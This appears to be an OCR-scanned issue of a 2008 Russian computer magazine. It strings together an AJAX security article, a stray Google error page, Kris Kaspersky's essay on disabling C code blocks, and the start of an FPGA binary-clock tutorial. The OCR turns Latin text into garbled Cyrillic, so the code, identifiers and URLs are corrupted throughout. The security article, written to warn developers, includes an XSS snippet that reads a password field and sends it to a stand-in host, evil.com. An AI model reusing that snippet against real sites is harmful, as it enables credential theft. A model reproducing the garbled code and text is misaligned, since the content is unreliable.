ших себя способа, известных как Ыаскіізйпд (спи сок запрещенных 
символов и их последовательностей] и ѵѵЬ ііеіізіі пд (список разре- 
шенных символов). Можешь использовать тот подход, который ближе 
к твоему желудку, но многие крутые челы сходятся во мнении, что 
ѵѵНйеІізйпд все же надежней будет. 

Не пренебрегай системами автоматизации поиска ошибок в веб- 
приложениях. Ведь есть очень простое правило — либо ты сам себя 
проверишь, либо тебя проверят. И последствия будут, мягко говоря, 
печальные. 

Динамическая генерация кода — абсолютное зло. Это еще одна 
непреложная истина АЗАХ-п рограм миро ван ия. Забудь про то, что 
вообще существует та кая функция, как еѵаіО, выполняющая любую 
текстовую строку какЗаѵаЗсгірІжод. 

Не переоценивай возможности 350ІЧ. Всегда держи в голове (даже 
если в ней вместо мозга плещется литр «Жигулевского»), что 350ІЧ 
— тот же ЗаѵаЗсгі рі. А значит, возможны всякие нежелательные 
ситуации. Например, с помощью той же функции еѵаЦ) злоумышлен- 
ник может преобразовать 330 N -объекты, защищенные от операций 
присвоения и активизации, в обычные ЗаѵаЗсгірІ-объекты. 

Для защиты 350ІЧ ты можешь воспользоваться регулярными выра- 
жениями, проверяющими принимаемую строку на предмет отсутст- 
вия активных фрагментов. Какэто сделать, можешь посмотреть на 
примере: 

ѵаг ту_Б8СЖ_оЪЗ еск = 

! (/ [ А , : {}\ [\] 0-9 .\-+Еаек1пг-и \п\г\к] /.кезк ( 
кехк . геріасе ( / " ( \ \ . I [ л " \ \ ] ) * " /д , ' ')))&& 
еѵаі ( 1 ( 1 + кехк + ' ) ’ ) ; 

Ну, а если ты хочешь раз и навсегда избавиться от подобных проблем с 
отравленными строками вЗЗОІЧ, юзай синтаксическиеЗЗОЫ-анализато- 
ры, и будеттебе счастье. 

И, наконец, всегда проверяй единство происхождения критических 
йОМ -элементов. Это легко сделать с помощью тега <іНате>, предо- 
ставив данным из разных источников отдельный контекст выполне- 
ния ЗаѵаЗсгірІ и предотвратив Ндаскіпд-атаку на свое приложение. 

0 САМОЕ ГЛАВНОЕ 

Подошло к концу журнальное место, отпущенное под статью. Подо- 
шел к концу и 2008 год. Это был непростой, но блистательный год для 
нашей страны, отмеченный массой побед и триумфов. Не подкачали 
и братья ІТ’шники, отметившиеся на ІтадіпеСир.А потому, позволь 
мне, откупорив бутылочку любимого самурайского пива, проводить 
уходящий год и поздравить тебя с наступающим 2009 годом! Что 
касается традиционных новогодних пожеланий, то скажу так: ста- 
бильного тебе линка и вечного аптайма ! Встретимся в новом году, 
камрад! ИР 
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5 * ОорзІ “Л"і!5 Ііпк арреагз Ь.„ 






согііпд 



Соодіе 



Ооре! ТЫз Ііпк арреагз Ьгокеп. 

НТТР 404 - ЯІе поі ТоипсІ. 



Зиддезііопз 

• Со Іо ІІпе Ноте раде о( іНе зііе: ѵуѵѵѵу.ѵѵвЫі о зіі пдге з оигсекіі.со т 

• Зеагсіі ѵѵііЫп іНе зііе ѵпѵѵѵ.ѵѵеЫіозІіпдгезоигсекіІ.сот Іог іНе Іегтз доодіе еггог 

• Тгу зеагсЫпд оп Соодіе: 



ѵі/еЬ Нозііпд гезоигсе кіі доодіе еггог 



Соодіе ЗеагсН 



боооіе ТооІЬаг Неір - ѴѴКѵ аш I зееіпо 1НІ5 раде? 
©2008 Соодіе * Соооіе Ноте 



От Нуаск не застрахован даже Соодіе 



недоразумений, я бы посоветовал запросы кэлементам массива прятать 
за более безопасными интерфейсами, используя, где возможно, вместо 
конструкции Роо = Ьаг[2] что-нибудь вроде Роо = ЪагзЪор. 
деСВуЫаше ( "шагі зиапа" ) или Роо=ЬагзЪор.деСВуІс1(999) , 
Другая проблема — обработка строковых данных. Например, функция 
замены символов. В С# функция ЗСгіпд. Керіасе ( ) заменяетвсе 
вхождения своего первого аргумента на второй. В 9аѵа5сгірІ аналогич- 
ная функция заменяеттолько первое вхождение! Аэто значит, что пря- 
мой проброс функций чреват новыми проблемами, будь они неладны: 

// с# 

ЗРгіпд РехР = "Роо Роо Роо Роо"; 

РехР = РехР . Керіасе (" Роо" , "Ъаг"); 

// результат — строка "Ьаг Ъаг Ъаг Ъаг" 

// ЪаѵаЗсгірР 

ѵаг РехР = "Роо Роо Роо Роо"; 

РехР = РехР . Керіасе (" Роо" , "Ъаг" ); 

// результат — строка "Ъаг Роо Роо Роо" 

Представь, что тебе нужно вычищать все явки-пароли из клиентских 
запросов (по причине чьей кривизны руконитуда попали, — это отде- 
льный разговор). Итак, желая перестраховаться отошибоккодеров, 
с их нетленками, выступающими в роли клиентов нашего серверного 
приложения, мы с помощью ПРО обращаемся кфункции 5Ргі пд. геріасеі) . 
Не принимая во внимание платформы клиента, можно столкнуться с 
продемонстрированной выше ситуацией. Еслиты не любитель попасть 
на проблемы, не забывай проверять платформу клиента перед вызовом 
удаленных процедур. Кстати говоря, это далеко не единственная пробле- 
ма со строками. Воттебе еще пример — извлечение подстроки. В С# 
метод ЗРгіпд . ЗиЪзРгіпд ( ) вызывается с двумя параметрами. Пер- 
вый — начальная позиция подстроки, и второй — ее длина. Аналогичный 
метод, ста ким же точно названием, есть в ЭаѵаЗсгірІ:. Да вот незадача, 
второй параметр указывает не на длину подстроки, а на позицию послед- 
него символа: 



//С# 

аиРЪ = "разз=рир_ѵ, изег=ѵаз"; 
зРгіпд ржі = аиРЪ . ЗиЪзРгіпд ( 5 , 5) ; 

// разз = рир_ѵ 

// ЦаѵаЗсгірР 

аиРЪ = "разз=рир_ѵ, изег=ѵаз" ; 
зРгіпд ржі = аиРЪ . ЗиЪзРгіпд ( 5 , 5) ; 

// результат — " " 

^ АМХШЕСТІОЫ 

Про $СІІ_ ІщесЪоп не писал только ленивый, и, я надеюсь, ты 
уже давно усвоил , как следует защищать свои веб-приложе- 
ния от не санкционированного доступа злобных хакеров баз 
данных. 

Используя А9АХ-фреймворки, тебе придется помнить еще и об А9АХ 
ІщесЪоп. Эта зараза особенно актуальна для Мазбир-приложений, 
которые в последнее время интенсивно завоевывают популярность 
на просторах глобальной Сети. Ограничусь констатацией того факта, 
что Мазбир за счет А9АХ объединяет несколько сетевых ресурсов в 
одно веб-приложение. Потенциальная опасность заключается втом, 
что с помощью Х55 можно подменить легитимный ЭаѵаЗсгі рі какой- 
нибудь нечистью. 

Ниже ты увидишь несколько примеров для затравки (надеюсь, ты не 
собираешься заниматься всякими глупостями). 

Имея доступ к 00 М -структуре, можно поиметь чужие кукисы и заветную 
последовательность символов из поля раззмогЪ: 

РипсРіоп Роо ( ) { 

ѵаг разз = ЪоситепР . деРЕІетепРВуІсі ( "раззжпгЪ" ) . ѵаіие; 
ЪоситепР . ішадез [ 0 ] . згс= 

"ЪРРр: //еѵіі . сот/ітдз/зРеаірѵ\г?рѵ\г= " + рм; 

} 

ЪоситепР . деРЕІетепРВуІсі ( "ЪиВРоп" ) .опсііск = Роо; 
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датеіап 



круглосуточный телеі 



огЬіпа 

іеіесот 



НТВ, ПЛЮС 



Информацию о подключении требуйте у вашего регионального оператора 









согііпд 



ТРЮКИ 
от КРЫСА 



КРИС КАСПЕРСКИ 



Язык Си не предоставляет никаких средств для временно го отключения блоков кода, и 
большинство программистов делают это с помощью комментариев. Казалось бы, что мо- 
жет быть проще и о каких трюках тут вообще вести речь?Нона самом деле, комментарии 
— едва ли не самый худший прием среди прочих, о которых мы сейчас и поговорим! 



Комментарии, ремарки и помарки| 



ІЕсли нам необходимо временно отключить блок кода, намного 
будетего закомментировать, а потом удалить комментарии, 
подключая обратно. Быстро, дешево, сердито. Но — потенциально 
небезопасно, сточки зрения внесения новых ошибок и развала уже 
отлаженной программы. А потому прежде, чем идти дальше, сформу- 
лируем перечень требований, предъявляемых к механизмам отключе- 
ния кода: 

• Легкость использования; 

• Вложенность (внутри отключаемого блока может находиться один 
или несколько ранее отключенных блоков); 

• Многоуровневость (если для отключения блока кода требуется 
исправить два и более несмежных фрагментов исходного текста, необ- 
ходимо гарантировать корректное снятие блокировки. Это становится 
особенно актуально, если отключаются независимые блоки А, В, С 

— тогда при включении блока В возникаетугроза подключения фраг- 
ментов, относящихся к блокам А и С. Что ведет к развалу программы); 

• Поддержка всех языковых конструкций (какой прок от инстру- 
мента, если он работаеттолько с ограниченным набором языковых 
конструкций, например, не позволяет отключать ассемблерные 
вставки?!). 

Удовлетворяют ли комментарии указанным требованиям? А вот и 
нет! Комментарии в стиле Си (/* */) очень удобны, поскольку 

позволяют отключать огромные блоки кода нажатием всего четырех 
клавиш, — к тому же они могут располагаться в любом месте строки, 
а не только в начале. Однако отсутствие поддержки вложенности 
создает серьезные проблемы. Например: 

/* <-- ошибка! закомментированный 
блок уже содержит /* */ 

бог (а = 0; а < ІЯ; а++) { 

/* 

бог (Ь = 0; Ь < М; Ъ++) 

іб ( ! з б гетр (пате_аггау [а] , ѵір_аггау [Ь] ) ) 
сопбіпие; 

*/ 



// БеІебеРіІе (пате_аггау [а] ) ; 
ргібпб ( " %б %з\п" , а, пате_аггау [а] ) ; 

} */ 

Попытка выключить цикл бог (а,,) ведет кошибке компиляции 
— комментарии /* */ не могутбыть вложенными. Втакихслучаях 

программисты используют альтернативу в виде «II», допускающую 
вложенность, но, увы, вручную проставляемую в начале каждой строки, 
что оченьутомительно и, мягко говоря, не производительно, если, ко- 
нечно, не использовать макросы, поддерживаемые средой разработки 
(а практически все среды разработки их поддерживают). Аналогично 
осуществляется и снятие комментариев. 

И все бы хорошо, да вот неоднозначности суровнем вложенности де- 
лают отключение блоков небезопасным. В нашем случае мы имеемтри 
раздельных отключаемых блока кода. Во-первых, это заблокированная 
проверка принадлежности удаляемого файла к ѵір_аггау. Во-вторых, 
собственно, самоудаление файла (заблокированное и замененное отла- 
дочной печатью черезргіпбб). И, в-третьих, комментарий, пытающий- 
ся отключить цикл бог (а,,) со всем, что в нем находится. 
Отключаются блоки кода очень просто, а вотобратноеутверждение 
уже неверно. Никаким автоматизмом тут и не пахнет, и в результате нам 
приходится разбираться с назначением каждого блока самостоятельно. 
Впрочем, если немного поколдовать над комментариями... 

Пусть следом за «II» идет цифра (или буква), указывающая принад- 
лежность текущей комментируемой строки к блоку кода. Продвинутые 
среды разработки типа М іегозобб Ѵізиаі 5бисІ іо поддерживают развитый 
макроязык. Он позволяет выполнятьлексический анализ, удаляя только 
те комментарии, за которыми идетзаданная буква/цифра. 

Это может выглядеть, например, так: 

Имитация многоуровневой структуры отключаемых блоков 
исходного кода посредством комментариев 

//3 бог (а = 0; а < Ы; а++) 

//3 { 

//3 //2 

//3 //2 бог (Ь = 0; Ь < М; Ъ++) 
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^ согііпд 



//3 //2 



іі ( ! збгстр (паше_аггау [а] , 
ѵір_аггау [Ь] ) ) сопбіпие; 



ОР 



у нас не будет никакой возможности отключить их без перекомпиляции 
всего кода. 



//3 7/2 

//3 //1 // БеІебеРіІе (пате_аггау [а] ) ; Ѵ |:Ц.!,ЫМ!Г 

//3 ргіспі ( " %сІ %з\п", а, пате_аггау [а] ) ; ^^^^Финальный прием устраняет основные недостатки предыдущего 



//3 } 

Проблема вложенности решена на 100%; проблема многовариантности 
— на 50% (послеудаления комментария //1 мы также должны удалить, а 
точнее, временно заблокировать следующую за ним строку с отладочной 
печатью]. Единственный серьезный недостаток— привязка програм- 
миста к конкретной среде с набором пользовательских макросов. 

іі!і-Ы1»ЛІ=ІН і ЛіМ=і!М , Ц-Ы!Ыіі;|іі!Н 

Разработанные для поддержки многовариантного кода дирек- 
тивы условной трансляции оказались практически невостребованными 
(речь, разумеется, идеттолько о временном выключении кода]. Это 
очень странно — они же намного более эффективны, чем комментарии! 
Пример, приведенный ниже, доказываетэтоттезис. 

Директивы препроцессора, отключающие блоки кода 

#бе:Еіпе _БІ_ // блок _Б1_ включен 

//#беПіпе _Б2_ // блок _Б2_ выключен 

#бе:Еіпе _БЗ_ // блок _БЗ_ включен 

#і1беі _Б1_ 



трюка, добавляя кнемусвои собственные достоинства, а достоинств 
у него... Короче, намного больше одного. Идея заключается в исполь- 
зовании конструкции іі (_Вх_) , а при необходимости и іі (_Вх_) 
еізе. Оператор «іП», стоящий перед одиночным блоком кода, нетребует 
замыкающего «#епбіі», что ускоряет процесс программирования и не 
таксильно загромождает л и стин г. Но это мелочь. Гораздо важнее, что 
если_Вх_ — константа (например, «1»), то оптимизирующий компилятор 
выбрасывает вызов \\, удаляя лишний оверхид. Если же _Вх_ — пере- 
менная (глобальная, конечно], то компилятор оставляет ветвление «как 
есть», давая нам возможность управлять поведением программы. Если 
у пользователей возникнут проблемы из-за ошибки в плохо отлаженном 
блоке кода, то этот блок можно отключить (естественно, если значения 
флагов вынесены в конфигурационный файл или доступны через пользо- 
вательский интерфейс, но это уже несущественные детали реализации). 
Пример использования ветвлений для отключения блоков кода приве- 
ден ниже: 

Использование ветвлений для выключения блоков кода 

#бебіпе _В1_ О 

// блок _В1_ выключен (ветвление в релиз не попадает) 




Ног (а = 0; а < Ы; а++) 



#беНіпе _ВЗ_ 1 



{ 

#іНбеН _Б2_ 



// блок _ВЗ_ включен (ветвление в релиз не попадает) 
іпб _В2_ 1 



Ног (Ь = 0; Ь < М; Ъ++) 

ІН ( ! зНгсшр (паше_аггау [а] , ѵір_аггау [Ь] ) ) сопНіпие; 
#епбіН 



// блок _В2_ включен (ветвление попадает в релиз! ) 
ІН (_В1_) 



#іНбеН _ВЗ_ 

БеІеНеРіІе (паше_аггау [а] ) ; 

#е1зе 

ргіНпН ( " %б %з\п" , а, паше_аггау [ а ] ) ; 

#епбіН 

} 

#епбіН 

Проблема вложенности решается сама собой; многовариантность 
поддерживается очень хорошо, позволяя нам включать/выключать 
определенные блоки и не затрагивая остальные, причем, при подклю- 
чении «БеІеНеРіІе (паше_аггау [а] ) » автоматически отключается 
отладочная печать — и наоборот. Рискразвала программы уменьшается 
до нуля. Самое интересное, что директивы условнойтрансляции ничуть 
не хуже работают и с ассемблерными вставками! 



Ног (а = 0; а < Б; а++) 

{ 

ІН (_Б2_) 

Ног (Ь = 0; Ь < М; Ъ++) 

ІН (! зНгсшр (паше_аггау [а] , ѵір_аггау [Ь] ) ) сопНіпие; 

ІН (_БЗ_) 

БеІеНеРіІе (паше_аггау [а] ) ; 
еізе 

ргіНпН ( " %б %з\п" , а, паше_аггау [а] ) ; 

} 

Как мы видим, этот код намного компактнее и нагляднее предыдущего, 
такчто при всемуважении кдирективам условной трансляции, они идут 
лесом. Авответвления можно использовать для выключения блока 
ассемблерных вставок (о чем, кстати говоря, умалчивает штатная доку- 
ментация, но следующий пример компилируется вполне нормально]: 



Директивы препроцессора, отключающие ассемблерные 
инструкции внутри ассемблерных вставок 

азш{ 

хог еах, еах 
#іНбеН _Б1_ 

РБЗН Ні1е_паше 
САШ БеІеНеРіІе 
#епс!іН 
} 

Конечно, писать«#іН беН _Бх_» намного длиннее, чем «//» или 
«/* * I», однако это не проблема — клавиатурные макросы на что? 

Про нежелание связаться с макросами мы уже говорили. Нуда макросы 
— это еще ладно. Хуже всего, что отключенные блоки кода не попадают в 
релиз, и если у конечного пользователя программа начнет дико глючить, 



Использование ветвлений для выключения ассемблерных вставок 

#бе!іпе _Б1_ 0 

іі (_В1_) 

азш{ 

ШТ 03 

} 

Ветвления, конечно, тоже не лишены недостатков, но для временного 
выключения блоков кода они намного лучше, удобнее и продуктивнее, 
чем комментарии. Разумеется, существуют и другие средства. Взять хотя 
бы «геШгп», позволяющий одним движением руки погасить блок кода до 
самого конца функции. Критикуемый СОТО — отличная штука, но только 
в малых дозах. Иначе программа превращается в настоящее спагетти, 
которое практически невозможно распутать. □С 
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КАК СДЕЛАТЫОЧНЫЕ ДВОИЧНЫЕ ЧАСЫ НА ПРОГРАММИРУЕМОМ ЛОГИКЕ 




Ты хотел изобрести собственный процессор со своей крутой системой команд, 
заточенный целиком подтвоюзадачу?Аполностью готовую риалтаймовую сис- 
тему обработки данных, расшифровывающую на ходу поток данных? Или соб- 
рать продвинутый логический анализатор за 50 баксов? В решении всех этих 
и многих других задач тебе может помочь ПЛИС — Программируемая Логичес- 
кая Электронная Схема! 



кратце, ПЛИС — это микросхема-матрица с кучей ножек, 
состоящая из логических элементов (ячеек), которую можно 
какугодно программировать, связывая между собой и конфи- 
гурируя ячейки так, чтобы они выполняли нужную именнотебелогическую 
функцию. Стандартная ячейка состоит из одного триггера, одной таблицы 
истинности и мультиплексора (смотри врезку). Например, чтобы объявить 
для твоего будущего процессора один 32-битный регистр, нам потребуется 
занять32 ячейки. А на оставшихся в ячейкахтаблицах истинности можно 
изобретать свое собственное процессорное ядро. Этим мы и займемся. 

Про программирование и принципы работы такого устройства я рас- 
скажу на примере обыкновенных двоичных часов. Кто не знает, — это 
такой девайс, где часы, минуты и секунды показываются в двоичной 
системе счисления, например, лампочками-светодиодами. То есть, 
время 01 : 28 : 0 5 будет выглядеть как 00001 :01 1 100:000101 , где единицы 
— горящие лампочки. Наша матрица будет считывать колебания -такты с 
кварцевого резонатора и каждую секунду зажигать нужные светодиоды, 
висящие на ее ногах. В качестве бонуса попробуем воткнуть на нашу 
плату еще 7-ячеистых дисплеев, чтобы и твои друзья, простые смертные, 



не умеющие определять время в двоичной системе, тоже могли узнавать 
его хотя бы с точностью до часа. 

^ ВЫБИРАЕМ ПРОИЗВОДИТЕЛЯ 

Для начала определимся с нашим будущим железом. Такуж истори- 
чески сложилось, что я использую микросхемы зарекомендовавшей 
себя фирмы АІПега. У нее много поклонников, обширное сообщество 
разработчиков и хорошая поддержка. А еще — огромный ассортимент, 
из которого может выбирать как профи, так и начинающий. Для нашей 
задачи подойдет Мах или Мах II с 240 элементами на борту. Для более 
серьезных экспериментов советую Сусіопе стысячами элементов 
за 1 0-20 баксов. Если тебе лень паять, то рекомендую разработку 
от озбѵѵ.ги . где друг журнала Павел «Вигокгаі» Косенков [который 
писал статью про аппаратный снифинг Еѣйегпеѣа, — Прим, ред.) 
продвигает отладочную плату с мощным процессором АП М 9 на борту и 
ПЛИС Сусіопе практически за себестоимость. АНега.сот тоже предла- 
гает платы на МАХ II & Сусіопе, но на последний цены уже кусаются... 
Настоящие Фрикеры могут отдельно купить микросхему и развести плату. 




► юб 
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Немного терминологии 



Логический вентиль. (Ьо^ісСаГе). 

Это такой кусок электрической схемы, который получает на вход 
одно или несколько лог. значений, а выдает всегда одно. По сути, ког- 
да мы слышим понятие «Таблица истинности», то имеем ввиду как 
раз такой вентиль. Он — базовый элемент для всего аппаратуростро- 
ения. Вентили могут объединяться в каскады и в итоге делать очень 
сложные операции типа сложения или сдвига регистра. Простейшие 
— это ^N0 (Не-И) и N011 (Не-Или), все остальные логические 
операции (АЫЭ, ОК, Ж)Т, ХОК, ХЫОК) строятся уже на их основе. 

В ПЛИСах для эмуляции вентилей используются так называемые 
Ьоокир-таблицы (ШТ) . Это просто кусочки памяти с содержащимися 
там таблицами истинности, куда управляющая схема «заглядывает» 
и делает нужную нам логику. 

Триггер. 

По-английски его называют РНр-РІор, что означает «шлепанцы». 

Все хорошо в логических вентилях, но они непоследовательны, то 
есть никак не «запоминают», что происходило на действие раньше. 

А триггер — вполне себе последователен, это такое логическое уст- 
ройство, выходное значение которого зависит не только от входного, 
но и предыстории его работы. Видов триггеров бывает великое 
множество для всяких разных задач. Например, простой КЗ-триггер, 
не меняющий своего состояния (выхода) при подаче на два его входа 
нулей или как-то меняющий его при подаче на один из них единицы. 

Но знай, только действительно Настоящий Фрикер сможет вытравить пла- 
ту для микросхемы с шагом ножек в полмиллиметра, а потом еще и запаять 
эти, минимум, 100 выводов! :) 

Матрицы АЙега МАХ II имеюттипы СРІЮ (Сотріех РгодгаттаЫе І_одіс 
Оеѵісе]. Это более продвинутая версия РРОА (Ріеісі РгодгаттаЫе 0а1;е 
Аггау), одна из фич которой — наличие внутренней памяти РОМ. Суть втом, 
чтоячейки РРОАили СРЮ незапоминаютсвое состояние при выключе- 
нии питания и вынуждены загружаться со встроенной или расположен- 
ной рядом микросхемы постоянной памяти. Так вот, в МАХ ничего рядом 
напаивать не надо, микросхема работает сама по себе с минимальной 
обвеской. За подробностями тебе сюда: ЬКрТ/аиега.сот/ргосІисЫ/сІеѵісез/ 
срИ/тах2/оѵегѵіе\л//агсЫі:ес1:иге/тх2-агсЫі:ес1:иге.Ы:т[ . 

^ СХЕМА НАШИХ ДВОИЧНЫХ ЧАСОВ 

Конструктивно она состоит из отладочной платы, которую ты, скорее все- 
го, уже купил, и монтажки, на которую запаяны диоды, дисплей и чуток 



Как и логический вентиль, триггер является базовой единицей в 
построении логических схем. Без него процессоры не могут сущест- 
вовать. Ибо внутренняя память процессора — регистры — как раз на 
триггерах и строится, а без них процессорам было бы бессмысленно 
подавать мегагерцы тактовой частоты. Все они были бы «однотак- 
товыми», никак не меняющими своего состояния с каждым новым 
тактом и не умеющими делать ничего сложнее однотактового 
сложения. 

Мы ввели регистр, как ячейку памяти, но совсем не обязательно 
регистр представлен триггером. Регистр с точки зрения языка 
описания аппаратуры — всего лишь средство объявить переменную. 
Компилятор имеет полное право оптимизировать операции, в том 
числе выкинуть регистр или добавить триггер, если это необходимо. 
Мультиплексор. 

Устройство, «перенаправляющее» сигнал с одного из своих многих 
входов на единственный выход. С какого именно входа будет осу- 
ществляться копирование — зависит от управляющих сигналов. 

Логическая ячейка ПЛИС. 

Их состав может варьироваться от микросхемы к микросхеме, но в 
общем случае ячейка состоит из одной Ьоокир-таблицы (эмулирует 
логику), одного триггера (эмулирует регистр) и одного мультиплек- 
сора (делающего условные операции іГ) . В общем, джентльменский 
набор базовой логики в одной ячейке. 

транзисторов. Между собой они связываются шиной. 

Все очень просто: 5 светодиодов на часы, 6 — на минуты и 6 — на секунды. 
Каждый диод будет соответствовать одному разряду числа; «+» диода бу- 
дет висеть на общей шине питания, а «-» — идти через резистор к ножке 
микросхемы. Когда мы подаем 0 на микросхему, то возникает разность 
потенциалов, и сквозьлампочкутечетток — она горит. При единице на 
ножке с двух сторон светодиода будет одинаковый потенциал, и ток не 
потечет. Но тут возникает проблема. Дело втом, что в моей отладочной 
плате с Альтеры наружу выведены только 16 ног, а нам для полноценных 
часов надо, минимум, 1 7 (и это не считая нашего бонуса с дисплеем «для 
простых смертных»]. С галерки мне кричат, что можно делать 12-часовые 
часы счетырьмя диодами, но мы ведь легких путей не ищем, правда?С 
твоей платой пинов можетбыть выведено больше, а вотмне пришлось 
делать несколько шин питания, которые надо было отдельно драйвить. 
Что это значит? Просто ноги микросхемы подведены одновременно к 
«минусам» нескольких светодиодов, а «плюсы» у них разные. Соответст- 
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История вопроса 

ПЛИСы берут свое начало примерно в 1970 году, когда Техаз 
Іштітепщ выпустили устройство ТМ52000. 

Первые микросхемы программируемой логики конфигурирова- 
лись еще на этапе роста кристалла путем наложения металличес- 
кой маски, замыкающей элементы. 

Идея пришлась по вкусу, и на свет родилось множество микросхем 
с разными типами элементов и способами их программиро- 
вания. Хочешь узнать больше — бегом на Википедию: Ьнр:// 



Отладочная плата с АТ915АМ9260, ЕіЬегпеОМах II и интерфейсными 
драйверами 



Двигай дальше 



Макетная плата с «матрицей» выводов и драйверами 

венно, в один момент времени гориттолько тот диод, у которого на «плю- 
се» есть напряжение. Аоно как раз и контролируется дополнительными 
ногами Альтеры. Переключаясь очень быстро между диодами, можно 
за ста вить гореть толь ко те, которые нужно. Питание можно включать, 
например, через транзистор Р-типа илитранзисторный драйвер. За не- 
имением сего, мне пришлось использовать драй вер І.М51 10 [ ШрУАлм/ѵѵ. 
паІіопаІ.сот/ріУЕМ/ЕМбІ Ю.ЫтІ І с некоторыми шаманствами. 

Н ТАК КАКЖЕ ПРОГРАММИРУЮТ ПОДОБНЫЕ УСТРОЙСТВА? 

Способов и языков существует великое множество. Фирменная ЮЕ и 
компилятор Оиагіиз поддерживают какязыки Ѵегііод и ѴНОЕ.таки их 
фирменные альтеровские модификации (АНОЦ. Можно даже рисовать 
твою будущую прошивку в виде блок-схемы, соединяя модули связями- 
шинами и прописывая на нихдействия (Віоск Оіадгапп]. Сложную про- 
шивку таким способом не напишешь, нозато будет наглядно. Почему-то 
у меня этотспособ не нашел понимания, но можешьего попробовать 
самостоятельно. Амы будем кодить на языке Ѵегііод. 

Что представляют из себя прошивки для ПЛИС? Представь себе сеть 
черных ящиков, стоящих в комнате, в которые входят одиночные прово- 
да и целые связки-шины. Каждый ящик делает внутри себя что-то одно 



Языки, подобные Ѵегііод и УНБЬ, используются и для производст- 
ва настоящих, полноценных процессоров. В какой-то момент 
эволюции в современных процессорах стало настолько много 
транзисторов, что рисовать чертеж целиком стало слишком 
накладно. Современные разработчики просто описывают новое 
процессорное ядро словами, а потом уже компилятор переводит 
исходный код в электрическую схему, оптимизирует располо- 
жение элементов, высчитывает тайминги между ними и делает 
прочую грязную работу. 

Кстати, ядро АКМ как раз потому и стало таким популярным, 
что его может лицензировать какой угодно разработчик, после 
чего ему присылают исходники, он дописывает туда нужную ему 
периферию с функциональностью и отдает на производство «в 
железе». Хочешь попробовать свои силы в создании ядра — присо- 
единяйся к СРЬ-проекту ОрепЗрагс (Ънр: //ддчдчдг.орепзрагс.пеО . 

и, в зависимости от входящих сигналов на одних проводах, выдаетчто- 
то на другие. Эти провода могут, в свою очередь, идти в соседний ящик 
или вообще выходить из комнаты-микросхемы. Наша задача — описать 
как внутренности ящиков, так и связи-провода между ними. Естест- 
венно, алгоритмическими языками программирования типа С или ^ѵа 
описывать такие вещи крайне сложно. Сам подумай, что скажет слесарь 
Петя из ПТУ, которому дадут задание обточить шестеренки для часов в 
виде алгоритмов их будущего поведения? Он ничего не обязан знать про 
их движение, для него они — просто стоящие на месте детали. Поэто- 
му задание компилятору нужно давать в виде статического описания 
сигналов и ответов на них. А самое сложное — это понять, что весь код, 
который ты видишь перед собой, будет выполняться полностью едино- 
временно! Можно совершенно безболезненно менять местами куски 
твоей программы, на результат это не повлияет: код ведь параллелен. 
Поэтому, если ты указываешь очередному черному ящику, что на каждое 
входящее число с шины он должен генерировать одиночный импульс, а 
на другую шину отправлять это число минус один, то абсолютно неважно, 
что он будет делать в первую очередь. Компилятор все равно разделит 
эти две подзадачи на разные не связанные между собой логические 
ячейки, к которым будет подходить один итотже внешний импульс. 

В языке Ѵегііод из знакомых тебе по алгоритмическим языкам структур 
нам будут доступны условия (іі), деревья-свитчи (сазе) функции-ме- 
гафункции, а также простейшие присваивания регистров, сдвиги и 
некоторые математические операции, хотя последние прямо в коде 
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использовать не рекомендуется. Привычныхтебе переменных здесь 
нету. Как нет и последовательностей действий, где этим переменным будут 
присваиваться значения. Вместо них есть регистры (гед).Ты наверняка 
слышал это слово и знаешь, что оно обозначает внутреннюю быструю 
память процессора. На самом деле их роль намного более существенна. 
Просто регистры — это единственный доступный нам способ сохранять 
данные междутактами. Описанные мной черные ящики — это так назы- 
ваемые машины состояний, а состояние — это и есть регистр, опора всего 
процессора (положение шестеренокв часах, например, тоже состояние]. 
Просто такданными между модулями кидаться нельзя, перед отсылкой 
надо их сначала сохранять в регистр (поэтому фраза «оиіриі <Имя>»чаще 
всего идет рядом с «гед [х: 0] <Имя»>]. 

Приведу пример. Представь себе ящик-механизм, который просто 
делит частоту входящих импульсов на два. Чтобы он работал, мы должны 
описать внутри него один однобитовый регистр (или, если тебеудобнее, 
шестеренку о двух зубцах — интересно, бываютлитакие? :)). Кактолько 
снаружи приходитсигнал, шестеренка-регистр делает пол-оборота, 
поэтому каждый второй сигнал она делает по обороту. Специальный ме- 
ханизм отслеживает ее состояние (в нашем случае он это делает в виде 
простенькой таблицы истинности] и на каждый оборот выводит импульс 
наружу через второй провод. 

Кроме ключевого слова гед мы будем использовать слова іприі, оиіриі:, 
іпоиідля связей наружу модуля, атакже словоѵѵіге, обозначающее 
внутримодульные связи. 

Теперь, когда нам известны базовые принципы программирования 
ПЛИС, можно приступать. 



^ ПОЕХАЛИ 

Идем на сайт ѵѵѵѵѵѵ.аііега.сопп и качаем программу Оиа Низ II ѴѴеЬ Ебіііоп. 
Программа бесплатна, ѴѴеЬ ЕсПбоп отличается отплатной версии 
отсутствием ненужных нам фич. Ставим ее. Она затребуетлицензию, 

— выбираем 1 50-дневную бесплатную продляемую. Пользователям 
Біпих бесплатная версия не поставляется, но вполне можно оседлать по 
определению бесплатный компилятор из командной строки, а средой 
пользоваться через ѴѴіпе. Или в текстовом редакторе исходники писать, 
такие люди тоже имеютправо нажизнь :]. 

Открываем Квартус, Еііе -> Ыеѵѵ Ргоіесі: ѴѴігагсІ, выбираем расположение и 
имя нашего будущего проекта, а также «Еор-Іеѵеі епІііЕу» — главный модуль, 
аналогсишной функции шаіп ( ) . Выбираем модель нашей микросхе- 
мы, ЕіпізЬ. Теперьсоздаем новый файл; среда предложиттип файла на 
выбор — выбираем Ѵегііод НОЕ Еііе из ветки йезідп Еііез, обзываем его 
как-нибудь, онтутже появится во вкладке Еііез. Дабл-клик по нему — и 
пишем код. 

Из чего же будет состоять наша прошивка? Давай представим задачу 
подсчета часов в терминах черных ящиков. Первый, самый главный, мы 
назовем Соипіег (Счетчик]. На вход ему будет подаваться 1 -герцовый 
часовой импульс и, можетбыть, кнопка «Сброс»; последнее зависит от 
тебя. На выход — три числа (или шины.таккакпо сути, это и будутшины 
медных проводников в Альтерине после компиляции]: часы (5 бит], 
минуты (6 бит] и секунды (6 бит). Внутри счетчика есть три всетехже 
регистра стой же шириной. Заметим, что понятия Байт для нас не сущес- 
твует. Надо — и 3-битовый процессор напишем, имеем право. Регистры 
мы используем экономно, каждый элемент на счету. 
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Какова задача счетчика? При поступлении положительного импульса на 
ногу Сіоскі Нт счетчик должен внутри себя увеличить секундный регистр 
/ на единицу, а при достижении в нем числа 60 — сбросить в 0 и увеличить 
минутный. Все внутренние проблемы берутна себя мегафункции зес_спЕ 
тіп_сп1: и Ьг_спі — модули типа Ірт_соипІег, написанные разработчиками 
